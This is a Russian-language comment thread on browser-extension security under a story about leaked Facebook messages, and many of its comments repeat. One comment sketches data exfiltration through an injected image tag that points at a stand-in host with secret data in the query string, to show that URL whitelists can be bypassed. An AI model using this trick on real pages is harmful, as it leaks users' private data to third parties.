Comments 17
Отличное решение проблемы, потом расширение говорит «мне нужно всё» и пользователь «окей, фонарик» и возвращаемся к предыдущему этапу. Хотя, конечно, на некоторый процент ьезопасность повысится.
Ещё вариант — в заголовке страницы новый парметр «запретить расширения здесь»(как появившиеся когда-то noindex/nofollow в ссылках для поисковиков) для банкинга или чатов, но где будут использовать? Правильно, на ютубе, чтобы не скачивали ролики и… вообще везде, чтобы не блокировали высплывающие окна, вылезающих дерьмоконсультантов и горы банеров.
Ещё вариант — последний пункт, но браузер спрашивает «страница запрашивает отключение расширений для fakebook.com/im*», произвести отключение? И где-то в настройках список, чтобы можно было управлять — отключить, включить, спрашивать для всех добавленных туда страниц.
Ещё вариант — в заголовке страницы новый парметр «запретить расширения здесь»(как появившиеся когда-то noindex/nofollow в ссылках для поисковиков) для банкинга или чатов, но где будут использовать? Правильно, на ютубе, чтобы не скачивали ролики и… вообще везде, чтобы не блокировали высплывающие окна, вылезающих дерьмоконсультантов и горы банеров.
Ещё вариант — последний пункт, но браузер спрашивает «страница запрашивает отключение расширений для fakebook.com/im*», произвести отключение? И где-то в настройках список, чтобы можно было управлять — отключить, включить, спрашивать для всех добавленных туда страниц.
Толку будет немного. Расширения ставят, запчастую, преследуя свои цели, типа «скачать видео/посмотреть список посетителей». Причём и явно подозрительные расширения. Я, порой, поражаюсь тому, с каким упорством люди делают это, даже если им пытается противостоять сам браузер, антивирус или ещё что-то. Такое упорство достойно лучшего применения.
Не менее серьёзная проблема связана с практикой перепродажи популярных расширений их разработчиками. С одной стороны, разработчик имеет право продать свой софт. С другой, это не должно приводить к автоматической установке в браузеры пользователей кода, написанного купившей расширение компанией — доверие пользователей к оригинальному разработчику не должно автоматически распространяться на нового разработчика. Из недавнего — ситуация со Stylish.
> Каждое расширение должно явно объявлять те URL, с которыми собирается взаимодействовать.
Это уже давно делается. Другой вопрос, что пользователи особо эту информацию не читают, и даже если читают, не способны угадать, как будет работать расширение. Может ему доступ к фейсбуку нужен, чтобы расшарить рекорд в игре или скачать видео, а может, чтобы слить вашу переписку. Как вы это проверите?
Гугл тоже хорош: не предупреждает пользователей про то, что расширения в Chrome store могут содержать вредоносный функционал. По-хорошему. там надо на каждой странице большими буквами писать предупреждение, что расширения могут быть вредоносными, и надо ставить расширения, только если лично доверяешь их автору (как и в случае с обычными десктопными приложениями, имеющими полный доступ к компьютеру). Но Гугл, как типичный американский бизнес, об этом конечно не говорит. Эти украденные данные — прямое следствие политики Гугла.
Увы, у Фаерфокса тоже есть аналогичные проблемы — разработчики предпочитают выносить функционал из браузера в расширения (вроде запрета JS на отдельных сайтах), мне это не нравится, так как их пишет непонятно кто и непонятно, можно ли им доверять. И не пишут про опасность расширений большими буквами. Мозилле я доверяю, а непонятным анонимам из интернета — нет.
То есть бизнес не хочет говорить людям правду, а хочет создавать ложное ощущение безопасности и комфорта.
Ну и есть небольшая надежда, что антивирусные компании обратят внимание на проблему и хотя бы те пользователи, которые пользуются антивирусами, будут защищены.
Я, кстати, стараюсь ставить только написанные лично расширения.
P.S. Подумал и вспомнил, что та же проблема у расширений для редакторов кода: вокруг можно увидеть советы, какие расширения поставить, но никто не пишет большими буквами про опасность. Неужели я один, кто это видит?
Это уже давно делается. Другой вопрос, что пользователи особо эту информацию не читают, и даже если читают, не способны угадать, как будет работать расширение. Может ему доступ к фейсбуку нужен, чтобы расшарить рекорд в игре или скачать видео, а может, чтобы слить вашу переписку. Как вы это проверите?
Гугл тоже хорош: не предупреждает пользователей про то, что расширения в Chrome store могут содержать вредоносный функционал. По-хорошему. там надо на каждой странице большими буквами писать предупреждение, что расширения могут быть вредоносными, и надо ставить расширения, только если лично доверяешь их автору (как и в случае с обычными десктопными приложениями, имеющими полный доступ к компьютеру). Но Гугл, как типичный американский бизнес, об этом конечно не говорит. Эти украденные данные — прямое следствие политики Гугла.
Увы, у Фаерфокса тоже есть аналогичные проблемы — разработчики предпочитают выносить функционал из браузера в расширения (вроде запрета JS на отдельных сайтах), мне это не нравится, так как их пишет непонятно кто и непонятно, можно ли им доверять. И не пишут про опасность расширений большими буквами. Мозилле я доверяю, а непонятным анонимам из интернета — нет.
То есть бизнес не хочет говорить людям правду, а хочет создавать ложное ощущение безопасности и комфорта.
Ну и есть небольшая надежда, что антивирусные компании обратят внимание на проблему и хотя бы те пользователи, которые пользуются антивирусами, будут защищены.
Я, кстати, стараюсь ставить только написанные лично расширения.
P.S. Подумал и вспомнил, что та же проблема у расширений для редакторов кода: вокруг можно увидеть советы, какие расширения поставить, но никто не пишет большими буквами про опасность. Неужели я один, кто это видит?
UFO just landed and posted this here
Не согласен. Сейчас пользователь видит только информацию про плюсы расширений и ставит их. Если будет предупреждение — он будет избегать ими пользоваться, кроме крайних случаев. Пользователей расширений будет меньше, ущерб от взлома — тоже меньше.
Это может вы смело игнорируете предупреждения, а технически не подкованные пользователи предпочтут не рисковать — починка компьютера не бесплатная.
Это может вы смело игнорируете предупреждения, а технически не подкованные пользователи предпочтут не рисковать — починка компьютера не бесплатная.
Это уже давно делается. Другой вопрос, что пользователи особо эту информацию не читают, и даже если читают, не способны угадать, как будет работать расширение. Может ему доступ к фейсбуку нужен, чтобы расшарить рекорд в игре или скачать видео, а может, чтобы слить вашу переписку. Как вы это проверите?
мне кажется имелось ввиду другое. То что расширение запрашивает разрешение на полный доступ и модификацию произвольных страниц, это есть.
Но речь как мне кажется, что расширение должно заранее обговаривать к каким ресурсам оно будет само обращаться, чтобы слить/ получить инфу на свой сервер.
Т.е. расширение говорит, я буду делать GET|POST по урлу rogaikopita.du/auth с целью антентефикаии пользователя
а GET|POST запрос rogaikopita.du/collect для сбора статистики, и пользователь об этом знает, то расширение на сторону никуда ничего не сольет. Если оно говорит «Никакие данные не отсылаю», то значит можно положиться на браузер и верить что он это проконтролирует. в данный момент такой механизм отсутствует.
Ваш вариант легко обходится. Если расширение имеет доступ к страницам произвольных сайтов, оно может туда вставить код для отправки запросов от имени сайта.
Он бы легко обходился, если бы то что я описал было бы вписано в текущую парадигму. Но можно ведь запретить инжектить javascript и затребовать на это ротдельные разрешения, если ты пишешь расширения, то знаешь, что content скрипты выполняются в своем неймспейсе, который имеет доступ в DOM, но браузер знает что это контент скрипт а не сприпт сайта. Можно так же заинжектить скрипт непосредственно в страницу, прям не отличить от скрипта сайта будет. Но это же все можно контролировать при желании.
Вобщем было бы желание.
Вобщем было бы желание.
Вставляем в DOM другого сайта картинку src=«example.com/i.php?secret-data=12345678900987654321».
Или заходим (расширением) в соцсеть и пересылаем секрет личным сообщением злоумышленнику. Или постим комментарием на ютубе.
Ограничить конечно можно, но сложно. По факту, если вы даете расширению доступ к странице сайта, то он может что угодно от имени страницы делать.
Или заходим (расширением) в соцсеть и пересылаем секрет личным сообщением злоумышленнику. Или постим комментарием на ютубе.
Ограничить конечно можно, но сложно. По факту, если вы даете расширению доступ к странице сайта, то он может что угодно от имени страницы делать.
UFO just landed and posted this here
Скачать расширение, поправить права в манифесте с "<all_urls>" на «htps://nuzniy_url/*» и установить его себе в режиме для разработчиков.
UFO just landed and posted this here
Смотреть надо, чего оно там делает. Но в целом думаю в 99% можно ограничить работу расширения одним/двумя/N сайтами при помощи правки разрешений. Они ведь для этого и нужны, чтобы определять, куда ему можно лезть, а куда нет. Сам щас поэксперементировал.
Недавно сделали такую возможность. Правда я сам ещё не пробовал это использовать.
Стоит ли россиянам переживать за приватность переписки в фейсбуке, если их точно читает ФСБ?
Sign up to leave a comment.
Приватные сообщения из 81 000 аккаунтов Facebook выставлены на продажу